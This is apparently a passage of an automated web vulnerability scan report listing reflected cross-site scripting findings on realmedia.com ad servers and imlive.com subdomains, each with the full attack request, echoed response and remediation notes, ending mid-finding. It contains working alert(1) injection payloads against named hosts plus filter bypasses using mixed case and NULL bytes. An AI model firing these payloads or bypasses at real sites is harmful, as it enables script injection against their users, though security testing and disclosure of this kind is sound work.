GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3453af"><script>alert(1)</script>99c2aff247f?_RM_HTML_MM_=101155000010000511001 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:19 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822c7"-alert(1)-"b8da27ec3b8 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=822c7"-alert(1)-"b8da27ec3b8 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:46:16 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1R10M5b|R10M5i|R1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 580 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:19 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "822c7"-alert(1)-"b8da27ec3b8"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e5f"><script>alert(1)</script>9bbe677cf54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:45 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01ee"><script>alert(1)</script>bb4f72e29db was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 260 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:51 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e249f"><script>alert(1)</script>16286ef0491 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:56 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9301d"-alert(1)-"d4991227f15 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:23 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|R10M5i|O10M5l|R10M5p|R10M5x|R10M62|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:25 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "1011550000100005110019301d"-alert(1)-"d4991227f15"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73248"><script>alert(1)</script>4d03b1824f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:40 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5c5f"><script>alert(1)</script>2d1714c1c8d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:45 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2e9"><script>alert(1)</script>572fba20dfd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 390 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:50 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c16f"-alert(1)-"ce5dc795775 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:31 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|R10M5i|O10M5l|R10M5p|R10M62|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 580 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:33 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "8c16f"-alert(1)-"ce5dc795775"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
4.698. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54070'-alert(1)-'486543e8cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?54070'-alert(1)-'486543e8cd0=1 HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/?54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&iy=dallas&id=44&iu=1&vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.699. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c=1 HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abf97'onerror%3d'alert(1)'3747a08c954 was submitted in the gotopage parameter. This input was echoed as abf97'onerror='alert(1)'3747a08c954 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/abf97'onerror%3d'alert(1)'3747a08c954 HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTQDQC=PKPLFJMAFPAENFFGPJDEIIPJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:25 GMT Connection: close Content-Length: 8315 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
4.701. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://no.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019f9e"><script>alert(1)</script>4ba4bc172bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19f9e"><script>alert(1)</script>4ba4bc172bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%0019f9e"><script>alert(1)</script>4ba4bc172bb=1 HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%0019f9e"><script>alert(1)</script>4ba4bc172bb~1');return false;"> ...[SNIP]...
4.702. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://no.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0a13'-alert(1)-'2db01fc98e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b0a13'-alert(1)-'2db01fc98e2=1 HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be3dc'onerror%3d'alert(1)'5045d73ef51 was submitted in the gotopage parameter. This input was echoed as be3dc'onerror='alert(1)'5045d73ef51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/be3dc'onerror%3d'alert(1)'5045d73ef51 HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ino=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQTQRCSD=FAOLDJMABFDNBFGJJENBGHOA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:24 GMT Connection: close Content-Length: 8316 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56b8"><script>alert(1)</script>a852931ac4b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.comf56b8"><script>alert(1)</script>a852931ac4b/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:59:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 805 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<!-- Ad Tag: Dominion 728x90 --> <script type="text/javascript"> var _bizo_ad_partner_id = "847"; var _bizo_ad_section_id = "ATF"; var _bizo_ad_width = "728"; var _bizo_ad_height = "90"; var _b ...[SNIP]... <IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.comf56b8"><script>alert(1)</script>a852931ac4b/index.php/L33/1487956133/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ba76"><script>alert(1)</script>a361e94a73 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php3ba76"><script>alert(1)</script>a361e94a73/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:59:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 804 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<!-- Ad Tag: Dominion 728x90 --> <script type="text/javascript"> var _bizo_ad_partner_id = "847"; var _bizo_ad_section_id = "ATF"; var _bizo_ad_width = "728"; var _bizo_ad_height = "90"; var _b ...[SNIP]... <IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php3ba76"><script>alert(1)</script>a361e94a73/L33/1730429269/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca2b"><script>alert(1)</script>29b9cf2ceff was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33fca2b"><script>alert(1)</script>29b9cf2ceff/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:59:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 807 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<!-- Ad Tag: Dominion 728x90 --> <script type="text/javascript"> var _bizo_ad_partner_id = "847"; var _bizo_ad_section_id = "ATF"; var _bizo_ad_width = "728"; var _bizo_ad_height = "90"; var _b ...[SNIP]... <IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33fca2b"><script>alert(1)</script>29b9cf2ceff/L/1509490205/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a381"><img%20src%3da%20onerror%3dalert(1)>1394e7e2a7b was submitted in the REST URL parameter 8. This input was echoed as 4a381"><img src=a onerror=alert(1)>1394e7e2a7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top4a381"><img%20src%3da%20onerror%3dalert(1)>1394e7e2a7b/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:00:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 807 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<!-- Ad Tag: Dominion 728x90 --> <script type="text/javascript"> var _bizo_ad_partner_id = "847"; var _bizo_ad_section_id = "ATF"; var _bizo_ad_width = "728"; var _bizo_ad_height = "90"; var _b ...[SNIP]... <IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/254616207/Top4a381"><img src=a onerror=alert(1)>1394e7e2a7b/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>
4.708. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385a6"><script>alert(1)</script>9acac63b02a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?385a6"><script>alert(1)</script>9acac63b02a=1 HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
